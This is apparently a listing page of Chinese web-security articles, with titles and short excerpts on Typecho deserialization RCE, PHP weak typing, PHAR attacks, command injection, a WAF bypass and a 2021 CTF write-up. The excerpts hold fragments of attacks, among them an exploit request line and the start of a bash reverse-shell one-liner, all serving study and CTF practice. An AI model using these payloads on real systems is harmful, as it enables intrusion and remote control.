0x01 PayloadGET /1/install.php?finish&user=admin&password=admin HTTP/1.1Host: 192.168.146.16...
Typecho install.php 反序列化导致任意代码执行
0x01 PayloadGET /1/install.php?finish&user=admin&password=admin HTTP/1.1Host: 192.168.146.16...
【CTF web入门-理论基础篇】php 弱类型总结
x01 前言最近CTF比赛,不止一次的出了php弱类型的题目,借此想总结一下关于php弱类型以及绕过方式0x02 知识介绍php中有两种比较的符号 == 与 ===1 <?php2 $a = $...
代码审计 | 记一次PHP入门代码审计
#0x01 sql注入###1.1 /admin/files/login.php 先看后台/admin/files/login.php可以看到没有过滤就直接带入查询了而且还写出报错,这里就可以使用报错...
利用PHAR协议进行PHP反序列化攻击
PHAR (“Php ARchive”) 是PHP中的打包文件,相当于Java中的JAR文件,在php5.3或者更高的版本中默认开启。PHAR文件缺省状态是只读的,当我们要创建一个Phar文件需要修改...
【代码审计】对一套钓鱼网站的代码审计
钓鱼网站介绍通过本地搭建该钓鱼网站,发现这是一个通过抓取转转交易网、猎趣交易网等页面的,伪造真实的商品购买页面进行钓鱼,受害人下单了但是钱却不是走官方平台交易,而是进了骗子的钱包,而受害者也不会真的收...
RCE命令注入-过滤CAT
CTF实验吧环境1.命令注入// 关键代码<?php$res = FALSE;if (isset($_GET['ip']) && $_GET['ip']) {// 传入ip, $...
【CTF web入门-理论基础篇】PHP伪协议在CTF中的应用
PHP伪协议在CTF中经常出现,也经常跟文件包含,文件上传,命令执行等漏洞结合在一起,所以本文章对常见的一些协议进行总结。文件包含是否支持%00截断取决于:PHP版本<=5.2 可以使用%00进...
PHP代码审计-变量覆盖
变量覆盖$$ extract()parse_str()mb_parse_str()import_request_variables()register_globals=On实例-MetInfo v5....
实战|记一次绕过宝塔防火墙的BC站渗透
0x00 信息收集由于主站存在云waf 一测就封 且初步测试不存在能用得上的洞 所以转战分站 希望能通过分站获得有价值的信息这是一个查询代理帐号的站 url输入admin 自动跳转至后台看这个参数 猜...
2021 强网杯 Write-Up (WEB部分)
Hard_Penetration题目内容:渗透测试主要以获取权限为主,这一次,你能获取到什么权限呢。前面是一个shiro反序列化,脚本都能打通,弹个shell:bash -c 'bash -i >...
PHP反序列化笔记
本文作者:是大方子(Ms08067实验室核心成员)﹀﹀﹀目录目录private变量与protected变量序列化后的特点序列化后的字段长度前面可以加+题目解题步骤CVE-2016-7124漏洞介绍演示...
141